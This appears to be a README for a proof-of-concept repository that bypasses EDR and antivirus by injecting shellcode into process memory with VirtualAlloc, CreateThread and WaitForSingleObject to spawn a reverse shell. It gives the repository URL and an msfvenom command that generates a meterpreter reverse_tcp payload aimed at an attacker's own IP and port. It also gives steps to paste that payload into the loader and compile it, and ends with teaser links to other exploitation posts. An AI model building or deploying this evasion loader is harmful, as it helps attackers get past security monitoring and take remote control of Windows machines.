This repository contains a proof-of-concept (PoC) for bypassing EDR and antivirus solutions using a memory injection technique.
The code executes shellcode that spawns a reverse shell, successfully evading detection by various security mechanisms.
This project demonstrates how to bypass EDR and antivirus protection using Windows API functions such as VirtualAlloc
, CreateThread
, and WaitForSingleObject
.
The payload is injected directly into the process memory without being detected by security tools, establishing a connection to a remote system for a reverse shell.
VirtualAlloc
and CreateThread
to inject the payload directly into process memoryhttps://github.com/murat-exp/EDR-Antivirus-Bypass-to-Gain-Shell-Access.git
cd EDR-Antivirus-Bypass-Shell-Access
Before compiling, ensure that you modify the shellcode to point to your own IP address and port for the reverse shell. You can generate shellcode using msfvenom:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=<YOUR_PORT> -f csharp
Replace the byte[] buf
section in Program.cs with the shellcode you just generated.
Open the project in Visual Studio, or use the following command to compile the code using the .NET SDK:
csc loader.cs
**Alternatively, you can compile in Release mode for better optimization:
csc -optimize loader.cs
For more information click here.
Cybersecurity tools play a critical role in safeguarding digital assets, systems, and networks from malicious…
MODeflattener is a specialized tool designed to reverse OLLVM's control flow flattening obfuscation through static…
"My Awesome List" is a curated collection of tools, libraries, and resources spanning various domains…
CVE-2018-17463, a type confusion vulnerability in Chrome’s V8 JavaScript engine, allowed attackers to execute arbitrary…
The blog post "Chrome Browser Exploitation, Part 1: Introduction to V8 and JavaScript Internals" provides…
The exploitation of CVE-2018-17463, a type confusion vulnerability in Chrome’s V8 JavaScript engine, relies on…